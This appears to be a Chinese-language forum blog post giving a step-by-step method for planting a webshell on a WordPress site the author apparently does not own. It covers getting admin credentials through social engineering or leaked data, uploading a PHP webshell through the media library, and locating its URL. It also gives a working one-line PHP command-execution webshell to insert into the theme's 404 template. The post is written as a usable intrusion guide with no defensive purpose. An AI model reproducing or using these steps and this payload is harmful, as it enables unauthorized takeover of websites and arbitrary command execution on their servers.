WordPress是世界上用的最多的一款blog,可以说是世界流行,在前段时间爆出有一个任意文件漏洞,但由于时间很忙就没有进行测试,最近偶然拿到一个WordPress的blog,实际测试效果不错,下面将整个过程写出来跟朋友分享。
(一)获取管理员用户名和密码
关于如何获取管理员用户和密码不在本文的主要讨论范围,笔者有两点经验,一个是社工;另外一个就是已有信息的利用;在获取Webshell的情况下,对现有信息的分析和利用,有可能获取WordPress后台管理密码。WordPress后台位置一般为:http://www.xxx.com/blog/wp-admin,显示页面如图1所示,输入正确的用户名和密码后顺利登录,如图2所示。
图1 WordPress登录后台
图2 成功登录后台
(二)寻找上传处
在WordPress管理页面的左边单击“媒体”-“新增媒体案”,接着就会出来一个上传的界面,在该界面中选择“Browser 上傳功能”,如图3所示,直接选择php的Webshell上传即可。
图3 获取上传页面
(三)浏览上传记录
上传Webshell后,有些系统装有杀毒软件会查杀部分Webshell,因此需要通过浏览记录来验证文件是否上传,系统在上传WebShell后会自动刷新,如果上传没有出现问题,则会如图4所示,上传文件显示在媒体库中。
图4 查看上传的Webshell记录
(四)获取Webshell的直接地址
将鼠标移动到上传的Webshell记录上,可以看到有三个按钮“編輯”、“刪除”和“查看”,单击查看即可访问Webshell的具体页面,如图5所示,选择记录中的链接,该链接地址即为真正的Webshell地址。
图5 获取上传的Webshell页面
(五)获取WebShell
直接打开Webshell的地址,输入密码验证成功后,进入熟悉的Webshell界面,如图6所示,至此拿到了WordPress的Webshell。
图6获取WebShell
(六)其他方法获取Webshell探讨
通过询问群里好友,感谢cnbird提供的一个方法,不过我测试后未能获取Webshell,不知是咋个回事,现将利用方法奉上:
(1)进入后台
(2)单击“外观”-“编辑”-“404模板”插入一句话木马程序代码:<?php@system($_REQUEST[c]);?>,如图7所示,插入后进行更新。
(3)使用连接地址wordpress/wp-content/themes/default/404.php进行连接。结果没有反应,很是郁闷!
图7 插入一句话代码
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
